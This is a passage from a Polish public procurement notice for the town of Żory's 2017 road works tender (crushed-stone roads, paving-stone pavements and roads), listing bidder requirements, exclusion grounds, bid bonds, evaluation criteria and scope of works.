Zamawiający dopuszcza aby ta sama osoba pełniła funkcję kierownika robót                         w przypadku ubiegania się o realizację więcej niż 1 części zamówienia.

W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy  w oparciu o art. 104 ustawy z dnia 7 lipca 1994r.  Prawo budowlane (Dz. U. z 2003r. Nr 207, poz. 2016 ze zmianami).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a) Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy pzp, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. b) 
-	informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy,  wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 
-	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
-	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
-	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
-	oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
-	oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
-	oświadczenia wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy; 
-	oświadczenia wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy; 
-	oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716); 

Wykonawcy, którzy polegają na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy pzp, przedstawiają w odniesieniu do tych podmiotów nw. dokumenty: 1)	informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 2) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 5) oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; 6) oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; 7) oświadczenia wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy; 8) oświadczenia wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy; 9) oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716)</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">- zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inny dokument potwierdzający ten fakt  (jeżeli Wykonawca polega na zasobach innych podmiotów), - W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zobowiązanie lub inny dokument, które należy dołączyć do oferty, ponadto winno wskazywać: 1) zakres dostępnych wykonawcy zasobów innego podmiotu; 2) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego; 3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego; 4) czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą. - pełnomocnictwo (jeśli dotyczy) - oświadczenie Wykonawcy dotyczące obowiązku podatkowego.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości:
Część 1 - 10.000,00zł (słownie: dziesięć tysięcy złotych 0/00)
    Część 2  5.000,00zł (słownie: pięć tysięcy złotych 0/00)
    Część 3 - 3.000,00zł (słownie: trzy tysiące złotych 0/00)
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Koszt wykonania (cena)</td><td>60</td></tr><tr><td>Okres gwarancji na roboty budowlane </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w sposób przewidziany przepisami art. 144 ustawy pzp.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 06/02/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Sprecyzowanie kryteriów oceny ofert:
w kryterium 1 w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik - cena  zostanie zastosowany następujący wzór arytmetyczny:
(n : b) x 60 
Oferta z najniższą ceną otrzyma 60 punktów, pozostałe proporcjonalnie mniej, gdzie:
a) n - wartość oferty z najmniejszą wartością, 
b) b - wartość oferty badanej, 
c) 60 - wskaźnik stały,

w kryterium 2 okres gwarancji na roboty budowlane ocena punktowa przedstawia się następująco:
1)	za udzielenie gwarancji wynoszącej od 36 do 59 miesięcy	- 0 punktów
2)	za udzielenie gwarancji wynoszącej 60 miesięcy			- 40 punktów 
W niniejszym kryterium Wykonawca może uzyskać maksymalnie 40 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 36 miesięcy 
(w przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp). 
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Utwardzenie dróg gminnych tłuczniem kamiennym<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utwardzenie dróg z kruszywa o grubości 35 cm po zagęszczeniu  około 15.000 m2
Zakres robót:
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	roboty rozbiórkowe istniejących elementów dróg (jeśli będą wymagane),
	wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi,
	załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru 
i opłatą za składowanie).
	profilowanie i zagęszczenie podłoża,
	wykonanie utwardzenia nawierzchni drogi tłuczniem kamiennym o średniej szerokości 5,0 m.
	regulacja pionowa włazów kanałowych studni, zaworów i zasuw (jeśli będzie konieczna),
	pełna obsługa geodezyjna ( odtworzenie i okazanie granic działek drogowych, pomiar geodezyjny powykonawczy ).
	ręczne plantowanie poboczy i porządkowanie terenu,
	humusowanie i obsianie poboczy trawą,

Roboty w ramach części 1 wykonywane będą na każdorazowe zlecenie Zamawiającego, wskazujące zakres robót do wykonania oraz termin i miejsce ich wykonania 
w zależności od bieżących potrzeb w granicach administracyjnych miasta Żory.
Ostatnie zlecenie zostanie przekazane Wykonawcy nie później niż do 15.10.2017r.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45112700-2,
                    45233142-6,
                    34922100-7,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Koszt wykonania (cena)</td><td>60</td></tr><tr><td>Okres gwarancji na roboty budowlane </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Sprecyzowanie kryteriów oceny ofert:
w kryterium 1 w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik - cena  zostanie zastosowany następujący wzór arytmetyczny:
(n : b) x 60 
Oferta z najniższą ceną otrzyma 60 punktów, pozostałe proporcjonalnie mniej, gdzie:
a) n - wartość oferty z najmniejszą wartością, 
b) b - wartość oferty badanej, 
c) 60 - wskaźnik stały,

w kryterium 2 okres gwarancji na roboty budowlane ocena punktowa przedstawia się następująco:
1)	za udzielenie gwarancji wynoszącej od 36 do 59 miesięcy	- 0 punktów
2)	za udzielenie gwarancji wynoszącej 60 miesięcy			- 40 punktów 
W niniejszym kryterium Wykonawca może uzyskać maksymalnie 40 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 36 miesięcy 
(w przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp). <br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Nawierzchnie z kostki brukowej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie 1  Wykonanie chodnika przy ul. Brzozowej
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej, z płyt chodnikowych, krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	korytowanie pod nowe nawierzchnie brukowe,
	załadunek i wywóz materiałów z korytowania,
	wykonanie wpustów deszczowych,
	przedłużenie przykanalików deszczowych,
	wykonanie warstwy odsączającej z piasku,
	wykonanie nowej podbudowy tłuczniowej pod nawierzchnie brukowe,
	ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
	ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
	wykonanie nawierzchni brukowych chodników z kostki brukowej betonowej wibroprasowanej gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara),
	wykonanie nawierzchni asfaltobetonowej,
	wymiana oznakowania pionowego,
	regulacja pionowa studzienek, zaworów oraz zasuw,
	przycięcie gałęzi,
	pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
	badania nośności podłoża gruntowego,
	humusowanie pobocza z obsianiem trawą,
	porządkowanie terenu po robotach budowlanych.

Zadanie 2  Wykonanie drogi ul. Elsnera
	organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
	rozbiórka nawierzchni asfaltowej,
	załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
	wyrównanie i czyszczenie istniejącej podbudowy z tłucznia,
	korytowanie pod poszerzenie drogi,,
	załadunek i wywóz materiałów z korytowania,
	wykonanie studni chłonnych betonowych,
	wykonanie wpustów deszczowych,
	wykonanie przykanalików deszczowych wraz z podłączeniem,
